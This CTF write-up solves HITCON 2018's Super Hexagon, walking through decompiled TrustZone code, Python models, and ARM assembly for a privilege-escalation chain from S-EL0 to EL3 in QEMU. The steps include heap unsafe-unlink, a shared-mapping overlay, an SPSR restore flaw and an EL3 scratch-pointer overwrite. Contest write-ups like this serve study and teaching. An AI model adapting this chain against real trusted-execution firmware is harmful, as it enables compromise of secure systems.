00000010: 8406 0000 0020 0000 a800 0000 0000 1000  ..... ..........
00000020: 7010 0800 b0b5 8eb0 00af 7860 41f2 6c03  p.........x`A.l.
00000030: c0f2 1803 1b68 7b63 42f2 0003 c0f2 0003  .....h{cB.......
00000040: 07f1 0c04 1d46 0fcd 0fc4 0fcd 0fc4 2b68  .....F........+h
00000050: 2380 7b6b 3b63 3b6b 0122 1a60 3b6b 0c33  #.{k;c;k.".`;k.3
00000060: 07f1 0c02 1146 1846 00f0 f8fa 0020 00f0  .....F.F..... ..
00000070: 0ffb b0b5 90b0 00af 7860 7b68 5b68 fb63  ........x`{h[h.c
00000080: fb6b 092b 09d8 40f2 0002 c0f2 1002 fb6b  .k.+..@........k
00000090: db00 1344 5b68 002b 1ad1 42f2 2403 c0f2  ...D[h.+..B.$...

The consistency of the first 0x20 bytes makes them look like a blob header, meaning this is probably a custom executable format. To understand it better, we’ll have to do some basic reversing of S-EL1.

According to EL3, S-EL1 is loaded at physical address 0xE400000 and from offset 0x20000 in bios.bin. It’s nonsensical in our aarch64 idb, but in our 32bit one we find a distinct interrupt table at that offset. Inside the reset handler we find the usual MSR twiddling and MMU setup. However, we’re instead interested in the function that handles secure calls, since that is the code responsible for tc_init_trustlet(). That handler occurs at 0x2087C, where we find 4 possible secure calls.

void sel1_handle_securecall(int cmd, int arg0, int arg1)
{
  int v0;

  switch ( cmd )
  {
    case 0:
      v0 = sel1_mmap_world_shared_memory(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 1:
      v0 = sel1_unmap_from_sel0(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 2:
      v0 = sel1_load_trusted_app(arg0, arg1);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    case 3:
      v0 = sel1_call_trusted_app(arg0);
      sel1_return_val_to_normal_world(0x83000007, v0);
      return;
    default:
      sel1_return_val_to_normal_world(0x83000007, -1);
      return;
  }
}

With the exception of sel1_unmap_from_sel0, we’ve seen these securecalls invoked from EL0. We can peek into sel1_load_trusted_app to better understand the binary format.

signed int sel1_load_trusted_inner(_DWORD *trustlet, unsigned int length)
{
  unsigned int v5;
  unsigned int v6;
  unsigned int len;
  _BYTE *v8;

  if ( !sel1_check_sha256(trustlet, length) )   // verify trustlet hash
    return -1;
  v8 = trustlet + trustlet[4] + 0x24;           // get the data section
  len = (((trustlet[4] - 1) >> 12) + 1) << 12;
  if ( sel1_map_page_into_sel0(trustlet[3], len, 10) == -1 )
    return -1;
  v6 = (((trustlet[6] - 1) >> 12) + 1) << 12;   // grab the bss length
  if ( trustlet[6] )
  {
    if ( sel1_map_page_into_sel0(trustlet[5], v6, 14) == -1 )
      return -1;
  }
  v5 = (((trustlet[8] - 1) >> 12) + 1) << 12;
  if ( trustlet[8] )
  {
    if ( sel1_map_page_into_sel0(trustlet[7], v5, 14) == -1 )
      return -1;
  }
  if ( sel1_map_page_into_sel0(0xFF8000u, 0x8000, 14) == -1 ) // map stack
    return -1;
  sel1_memset(trustlet[3], 0, len);
  sel1_memcpy(trustlet[3], trustlet + 0x24, trustlet[4]);// copy in text section
  if ( trustlet[6] )
  {
    sel1_memset(trustlet[5], 0, v6);
    sel1_memcpy(trustlet[5], v8, trustlet[6]);
  }
  if ( trustlet[8] )
    sel1_memset(trustlet[7], 0, v5);
  sel1_memset(0xFF8000, 0, 0x8000);             // set up stack
  sel0_stored_retaddr = trustlet[2];
  sel0_cmdbuf_addr = trustlet[8] + trustlet[7] - 4;
  return 0;
}

After verifying the sha256 of the image against a hardcoded hash, it loads a text, data, and bss section from the buffer. No relocations, so ASLR is off. Armed with this information, we can load the file into IDA and lay out segments at fixed addresses to get an understanding of S-EL0.
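
The loader logic translates directly into a header parser. Below is a minimal Python sketch that decodes the first 0x24 bytes of the trustlet shown in the hexdump. The field names are my own reading of the loader (dwords 3/4 as text, 5/6 as data, 7/8 as bss), not names taken from the binary.

```python
import struct

HEADER_SIZE = 0x24

# First 0x24 bytes of the trustlet, copied from the hexdump.
HEADER = bytes.fromhex(
    "484954434f4e0000" "6b120000" "00100000" "84060000"
    "00200000" "a8000000" "00001000" "70100800"
)


def page_round(n):
    """Same rounding the loader uses: (((n - 1) >> 12) + 1) << 12."""
    return (((n - 1) >> 12) + 1) << 12


def parse_trustlet_header(blob):
    """Decode the 8-byte magic and the seven little-endian dwords after it."""
    magic, entry, text_va, text_len, data_va, data_len, bss_va, bss_len = (
        struct.unpack_from("<8s7I", blob, 0)
    )
    return {
        "magic": magic,
        "entry": entry,                        # trustlet[2]
        "text_va": text_va, "text_len": text_len,
        "data_va": data_va, "data_len": data_len,
        "bss_va": bss_va, "bss_len": bss_len,
        "file_size": HEADER_SIZE + text_len + data_len,
        "cmdbuf": bss_va + bss_len - 4,        # trustlet[8] + trustlet[7] - 4
    }


if __name__ == "__main__":
    for key, value in parse_trustlet_header(HEADER).items():
        print(key, value if isinstance(value, bytes) else hex(value))
```

A useful sanity check is that the header size plus the text and data lengths adds up to the 0x750 bytes registered from EL0.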

S-EL0 is a small binary composed of big-endian thumb code. In its command handler, it receives a pointer to a “tci” buffer, where the first dword is a command type. Only load_key and save_key are defined, but of interest is that save_key allocates buffers for the keys via a simple dlmalloc implementation. It invokes malloc() for a new key index, and if an existing key index is given to overwrite, it will first free() the value at that position.

The save_key and load_key functions operate on the handle passed by userspace, where that handle is actually the buffer’s S-EL0 virtual address. This means we can operate on any “buffer” by passing in an arbitrary “handle”.

This heap allocator uses the same chunk header as glibc malloc would use for a smallbin. Rather than multiple freelists based on chunk size, it puts all chunks into a single one comparable to glibc’s unsortedbin list. It does support mmap’d chunks when the size requested is >0x40000. When freeing a non-mmap’d chunk, it will attempt consolidation with the previous and next chunks.

After spending some time auditing the heap implementation, I became interested in the mmap chunk code, since if we could get a writable mapping to the page the chunk was in, we’d be able to directly write to the chunk header. Here’s the relevant mmap syscall handler in S-EL1.

_BYTE * sel1_mmap_syscall(__int16 req_virtaddr, int size)
{
  int v4;
  _BYTE *v5;

  v4 = size;
  if ( req_virtaddr & 0xFFF )
    return -1;
  if ( size & 0xFFF )
    return -1;
  if ( !size )
    return -1;
  v5 = sel1_find_contig_virtpage(size);
  if ( v5 == -1 || sel1_map_page_into_sel0(v5, v4, 10) == -1 )
    return -1;
  sel1_memset(v5, 0, v4);
  return v5;
}

The code attempts to find a contiguous set of virtual addresses to suit the mapping, then sel1_map_page_into_sel0 will choose physical addresses and update the translation tables. Now, take a look at the sel1_mmap_world_shared_memory securecall handler we had access to via EL0.

signed int sel1_mmap_world_shared_memory(unsigned int physaddr, int size)
{
  signed int v2;
  int v6;

  if ( !size
    || size & 0xFFF
    || physaddr & 0xFFF
    || physaddr < 0x40000000
    || (v6 = sel1_find_contig_virtpage(size), v6 == -1)
    || sel1_map_page_tables(v6, physaddr, size, 2) == -1 )
  {
    v2 = -1;
  }
  else
  {
    v2 = v6;
  }
  return v2;
}

This code uses the same virtual address range! Finally, note the unused munmap syscall and securecall. With these primitives, we’ll actually use the interaction of S-EL1 to pwn S-EL0 in the following way.

Make a mapping in S-EL0 of size 0x40000. We need a buffer this big in S-EL0 as a source for the memcpy() initializing our chunk.
Use the unmap securecall to unmap the first page of the mapping.
Map in a single normal world physical page as world shared memory. This will land on our just-freed virtual address.
Fill up the trusted app request to cause an mmap’d chunk of size 0x40000 to be created.
Free the first page of that chunk with the unmap securecall.
Map over it to fully control the chunk header.
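
The address reuse in the steps above can be sketched with a toy model. This is a minimal Python sketch, not the blob's allocator: it assumes sel1_find_contig_virtpage behaves like a first-fit search over a fixed window of pages, and the names VirtPageAllocator, BASE and replay_steps are hypothetical.

```python
PAGE = 0x1000
BASE = 0x100000  # hypothetical start of the shared virtual window


class VirtPageAllocator:
    """Toy first-fit allocator shared by the mmap syscall and the securecall."""

    def __init__(self, base, npages):
        self.base = base
        self.used = [False] * npages

    def find_contig(self, size):
        """Reserve the lowest run of free pages covering `size` bytes, or return -1."""
        need = size // PAGE
        if need == 0:
            return -1
        run = 0
        for i, busy in enumerate(self.used):
            run = 0 if busy else run + 1
            if run == need:
                start = i - need + 1
                self.used[start:i + 1] = [True] * need
                return self.base + start * PAGE
        return -1

    def unmap(self, addr, size):
        """Mark the pages covering [addr, addr + size) as free again."""
        first = (addr - self.base) // PAGE
        count = size // PAGE
        self.used[first:first + count] = [False] * count


def replay_steps():
    """Replay the six steps and report where each mapping lands."""
    alloc = VirtPageAllocator(BASE, 0x100)
    src = alloc.find_contig(0x40000)    # 1. large source buffer in S-EL0
    alloc.unmap(src, PAGE)              # 2. unmap its first page
    wsm = alloc.find_contig(PAGE)       # 3. shared memory takes the freed page
    chunk = alloc.find_contig(0x40000)  # 4. mmap'd heap chunk
    alloc.unmap(chunk, PAGE)            # 5. unmap the page holding the header
    overlay = alloc.find_contig(PAGE)   # 6. shared memory lands on the header
    return {"src": src, "wsm": wsm, "chunk": chunk, "overlay": overlay}
```

In this model the single-page shared mapping always lands on the page that was just released, which is the property the attack relies on.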

Once we have control of the chunk header, we’ll twiddle the bits to convert it to a normal chunk, and then abuse heap consolidation’s unsafe-unlink to trigger a write to the saved return address in sel0_free. Everything in S-EL0 is mapped RWX, so we can just return directly to our shellcode buffer and gain S-EL0 execution.
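
As a rough illustration of that write primitive, here is a sketch of an unchecked unlink over a dictionary-backed memory. It assumes a 32-bit glibc-style layout (fd at offset 8, bk at offset 12) and no safe-unlinking checks; the Memory class, the helper names and all addresses are hypothetical and are not taken from the trusted application.

```python
IS_MMAPPED = 0x2        # glibc size-field flag for mmap'd chunks
FD_OFF, BK_OFF = 8, 12  # 32-bit layout: prev_size, size, fd, bk


class Memory:
    """Sparse 32-bit word store standing in for S-EL0 memory."""

    def __init__(self):
        self.words = {}

    def read32(self, addr):
        return self.words.get(addr, 0)

    def write32(self, addr, value):
        self.words[addr] = value & 0xFFFFFFFF


def clear_mmapped(size_field):
    """Turn an mmap'd chunk's size field into a normal chunk's size field."""
    return size_field & ~IS_MMAPPED


def forge_links(mem, chunk, target, value):
    """Set fd/bk on a fake free chunk so unlinking writes `value` to `target`."""
    mem.write32(chunk + FD_OFF, target - BK_OFF)
    mem.write32(chunk + BK_OFF, value)


def unsafe_unlink(mem, chunk):
    """Classic unlink without integrity checks: FD->bk = BK; BK->fd = FD."""
    fd = mem.read32(chunk + FD_OFF)
    bk = mem.read32(chunk + BK_OFF)
    mem.write32(fd + BK_OFF, bk)
    mem.write32(bk + FD_OFF, fd)
```

Note the side effect: the second store also writes `target - 12` to `value + 8`, so when `value` is the shellcode address, the word at offset 8 of the shellcode is clobbered and the payload has to tolerate or jump over it.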

As a final note, 32-bit ARM doesn’t access system registers with mrs/msr the way aarch64 does, so we read the flag through coprocessor 15 with the mrc instruction:

mrc p15,3,r1,c15,c12,0
str r1, [r0]
mrc p15,3,r1,c15,c12,1
str r1, [r0,#4]
mrc p15,3,r1,c15,c12,2
str r1, [r0,#8]
mrc p15,3,r1,c15,c12,3
str r1, [r0,#0xC]
mrc p15,3,r1,c15,c12,4
str r1, [r0,#0x10]
mrc p15,3,r1,c15,c12,5
str r1, [r0,#0x14]
mrc p15,3,r1,c15,c12,6
str r1, [r0,#0x18]
mrc p15,3,r1,c15,c12,7
str r1, [r0,#0x1c]
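
The listing is regular enough to generate rather than type by hand. The helper below is a small sketch that emits the same mrc/str pairs for a solution script; flag_read_asm and its parameters are hypothetical names, and it writes every non-zero offset in hex.

```python
def flag_read_asm(words=8, dest="r0", tmp="r1"):
    """Emit mrc/str pairs copying `words` 32-bit flag registers to [dest]."""
    lines = []
    for i in range(words):
        # opc2 selects which 32-bit slice of the flag is read
        lines.append(f"mrc p15,3,{tmp},c15,c12,{i}")
        offset = 4 * i
        if offset == 0:
            lines.append(f"str {tmp}, [{dest}]")
        else:
            lines.append(f"str {tmp}, [{dest},#{offset:#x}]")
    return lines
```

Joining the result with newlines gives a block that can be handed to whatever assembler the exploit script already uses.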

S-EL1: Failing upwards

To solve S-EL0 we performed some significant reversing on the syscall and securecall interfaces of S-EL1. When moving on to S-EL1, my first intuition was to examine the precise operation of the munmap and mmap handlers. These interested me because both secure and normal world pages could be mapped into the virtual address space. Both mmap and map_world_shared_memory store physical pages into the same table. However, the munmap syscall is identical to the securecall, and doesn’t special-case pages from different worlds. Thinking along those lines, the first bug I noticed was inside map_world_shared_memory. It rejects any physaddr < 0x40000000, preventing users from mapping pages below the VIRT_MEM base assigned by QEMU. The mapping itself is then performed one page at a time:

while ( 1 )
{
    if ( !len )
        return 0;
    if ( sel1_update_page_table(virtaddr, physaddr, prot) == -1 )
        break;
    virtaddr += 0x1000;
    physaddr += 0x1000;
    len -= 4096;
}

However, the mapping loop never checks for integer overflow as it advances physaddr. A call like map_wsm(0xFFFFF000, 0x2000) passes the initial check, and on the second iteration physaddr wraps around to 0, so the first page of EL3 becomes accessible to our S-EL0 shellcode through the new virtual mapping. And in fact, that does happen! But there’s a catch: since those pages belong to VIRT_FLASH, QEMU allows reads but silently (!) drops writes to that address range without faulting. Confusingly, gdb can still write to those pages, likely because the QEMU gdbserver doesn’t distinguish between physical page types.
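
The wraparound is easy to check with a few lines of Python. This sketch models only the arithmetic, assuming physaddr is held in a 32-bit register as the decompiled `unsigned int` suggests; passes_check and mapped_phys_pages are hypothetical names.

```python
PAGE = 0x1000
MASK32 = 0xFFFFFFFF
VIRT_MEM_BASE = 0x40000000


def passes_check(physaddr, size):
    """Mirror the securecall's validation of its two arguments."""
    return not (size == 0 or size & 0xFFF or physaddr & 0xFFF
                or physaddr < VIRT_MEM_BASE)


def mapped_phys_pages(physaddr, size):
    """List the physical pages the loop maps, with 32-bit wraparound."""
    pages = []
    remaining = size
    while remaining:
        pages.append(physaddr)
        physaddr = (physaddr + PAGE) & MASK32  # no overflow check, as in the loop
        remaining -= PAGE
    return pages
```

With the arguments from the text, `mapped_phys_pages(0xFFFFF000, 0x2000)` yields `[0xFFFFF000, 0x0]`: only the starting address is validated, so the second page lands at physical address 0.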

gef> x/i $pc
=> 0x237d318:   str     r3, [r1]
gef> x/xw $r1
0x237c80c:      0x91000042
gef> p $r3
$12 = 0x41414141
gef> stepi
gef> x/xw $r1
0x237c80c:      0x91000042

Taking a step back, it’s likely that any S-EL1 bugs would be present in a syscall, or at least require the use of a syscall. This would require players to pwn S-EL0 first, which makes sense from the standpoint of the CTF. One interesting syscall is signal, which allows the trusted application to define a signal handler. The HITCON blob uses this to catch errors and populate the user’s buffer with an error code and string.

signed int sel1_set_signal_handler(int a1, unsigned int a2)
{
  if ( a2 < 0x2400000 && a1 == 11 )
    sel0_sighandler_addr = a2;
  return -1;
}

S-EL1 stores the user’s argument in a global in its memory. Whenever a data or prefetch abort occurs, execution flows to sel1_handle_signal to check for the presence of a defined handler. That function will determine whether the handler is thumb or arm mode (checking the bottom bit) and populate state accordingly.

0x08001588             sel1_data_abort
0x08001588 STR             LR, [SP,#0x3C] ; Store to Memory
0x0800158C MRS             LR, SPSR ; Transfer PSR to Register ; <---- [A]
0x08001590 STR             LR, [SP,#0x40] ; Store to Memory
0x08001594 CPS             #0x13   ; Change Processor State
0x08001598 BL              sel1_save_regs ; Branch with Link
0x0800159C  ---------------------------------------------------------------------------
0x0800159C LDR             R8, [SP,#0x44] ; Load from Memory
0x080015A0 CPS             #0x1F   ; Change Processor State
0x080015A4 MOV             SP, R8  ; Rd = Op2
0x080015A8 MOV             R0, #0x17 ; Rd = Op2
0x080015AC BLX             sel1_handle_signal ; Change stored pc to saved handler
0x080015B0 B               sel1_return_from_interrupt

0x0800187C             sel1_return_from_interrupt
0x0800187C CPS             #0x13   ; Change Processor State
0x08001880 LDR             R0, [SP,#arg_40] ; Load from Memory
0x08001884 MSR             SPSR_cxsf, R0 ; Transfer Register to PSR  ; <---- [B]
0x08001888 B               loc_8001870


0x08001870 BL              sel1_restore_regs
0x08001874 LDR             LR, [SP,#0x3C] ; Load from Memory
0x08001878 MOVS            PC, LR  ; Rd = Op2

sel1_handle_signal is primarily responsible for overwriting the saved PC value. Though this is a data abort handler, it looks most similar to the syscall handler and reuses a lot of its code. However, data aborts can occur in either S-EL0 or S-EL1. At point A, the handler saves the SPSR value, which records the mode (and therefore the exception level) that took the abort, onto the stack. Later, at B, it unconditionally restores that saved state! The duplicated path from the syscall handler didn’t account for the fact that a syscall in S-EL1 would return to EL3, but a data abort in S-EL1 still returns to S-EL1.

In other words, if we define a signal handler in S-EL0 then trigger a data abort in S-EL1, we’ll execute our shellcode with S-EL1’s exception level.
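
To make the control flow concrete, here is a small model of the buggy path. It is a sketch under assumptions: the mode constants are the architectural AArch32 values, the bounds check is copied from sel1_set_signal_handler, and the way the Thumb bit is set is my guess at "populating state accordingly". The function names and the state dictionary are hypothetical.

```python
MODE_MASK = 0x1F
MODE_USR = 0x10     # AArch32 User mode (S-EL0)
MODE_SVC = 0x13     # AArch32 Supervisor mode (S-EL1)
THUMB_BIT = 1 << 5  # CPSR.T


def set_signal_handler(state, signum, addr):
    """Same checks as the syscall: only signal 11, handler below 0x2400000."""
    if addr < 0x2400000 and signum == 11:
        state["handler"] = addr


def deliver_data_abort(state, cpsr_at_fault, fault_pc):
    """Return the (pc, cpsr) that execution resumes with after the abort."""
    saved_spsr = cpsr_at_fault      # [A] mode of the faulting context is saved
    saved_pc = fault_pc
    handler = state.get("handler")
    if handler is not None:
        saved_pc = handler & ~1     # redirect the saved PC to the handler
        if handler & 1:
            saved_spsr |= THUMB_BIT
        else:
            saved_spsr &= ~THUMB_BIT
    return saved_pc, saved_spsr     # [B] restored without checking the mode
```

Feeding it an abort taken in Supervisor mode returns the S-EL0 handler address together with Supervisor mode bits, which is exactly the privilege escalation described above.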

EL3: Escaping the matrix

EL3 is the final frontier for our challenge. At this point I’d done a reasonable amount of reversing on it already to determine where other exception levels were mapped and how securecalls are passed back and forth through the secure monitor code. After performing system setup, the actual core of EL3 is very small, mainly serving as a secure monitor that shuttles calls between normal and secure worlds. S-EL1 is capable of pointing its TTEs at EL3 pages to get an accessible mapping. However, the EL3 code executes directly off the read-only VIRT_FLASH pages, so we cannot write to its code pages directly.

Let’s examine the code responsible for shuttling a secure call between worlds, in pursuit of a suitable write target.

if ( cmd != 0x83000007 )
{
  sub_D28();
  sub_310();
}
el3_switch_world(0);
retvalptr = el3_get_world_scratch(1u);
el3_set_current_world(1u);
el3_set_el1_sp(1u);
*retvalptr = v9;
result = retvalptr;

This code is responsible for returning to the Normal World with an error code. It retrieves a pointer to the Normal World’s (id 1) saved execution state, then overwrites the stored x0 register value. It also transitions back to Normal World before returning.

_QWORD * el3_get_world_scratch(unsigned int a1)
{
  return *(_QWORD **)(0xE002410 + 8i64 * a1);
}

As we can see, pointers to the per-world scratch buffers are stored as the first two qwords of an array at 0xE002410. This page is within the VIRT_SECURE_MEM physical range, so we can point an S-EL1 TTE at it to read and write its contents. If we overwrite the Normal World entry at 0xE002418 with a pointer of our choosing, we obtain an arbitrary write by returning a 64-bit value from Secure World. ASLR isn’t enabled on the EL3 stack, so it’s easy enough to clobber a saved return address and jump directly to our shellcode payload running in EL3.
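
The slot arithmetic and the resulting write can be modelled in a few lines. This is a sketch only: the table address and the VIRT_SECURE_MEM range come from the listings above, while El3Model and every address passed to it are hypothetical placeholders, not values recovered from the blob.

```python
SECURE_MEM_BASE = 0x0E000000
SECURE_MEM_SIZE = 0x01000000
SCRATCH_TABLE = 0x0E002410
NORMAL_WORLD = 1
MASK64 = 0xFFFFFFFFFFFFFFFF


def scratch_slot(world):
    """Address of the table entry holding that world's scratch pointer."""
    return SCRATCH_TABLE + 8 * world


def in_secure_mem(addr):
    """True if addr falls inside the VIRT_SECURE_MEM physical range."""
    return SECURE_MEM_BASE <= addr < SECURE_MEM_BASE + SECURE_MEM_SIZE


class El3Model:
    """Sparse qword store with the return-to-Normal-World store modelled."""

    def __init__(self, normal_world_ctx):
        self.qwords = {scratch_slot(NORMAL_WORLD): normal_world_ctx}

    def write64(self, addr, value):
        self.qwords[addr] = value & MASK64

    def return_to_normal_world(self, retval):
        # *retvalptr = v9, where retvalptr comes from the scratch table
        retvalptr = self.qwords[scratch_slot(NORMAL_WORLD)]
        self.write64(retvalptr, retval)
```

Overwriting the entry at `scratch_slot(1)` from S-EL1 and then returning a chosen value makes `return_to_normal_world` store that value at the chosen address, which is the write-what-where used to hit the saved return address.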

Parting Thoughts

Over the past several years, CTFs have become increasingly involved and reflective of real world vulnerability research. CTF is a common route for new talent to break into the industry, and for professionals to use their skills in competition. Challenges are often written based on inspiration from bugs the authors have seen elsewhere, and Super Hexagon definitely felt that way to me.

HITCON is always one of the top CTFs of the year, and 2018 did not disappoint. The organizers had forgone having a final that year and so the challenges during the online event were all difficult and novel. I would consider it one of my favorite events of the year, and based on recent updates to their website, it appears that HITCON 2019 will be taking place. I’d encourage anyone who has made it this far to participate.

Until then, you can find my full solution scripts and notes for Super Hexagon on my GitHub here.

Other Writeups

Super Hexagon: A Journey from EL0 to S-EL3, by Grant Hernandez (Kernel Sanders)

PPP’s writeup

Balsn’s writeup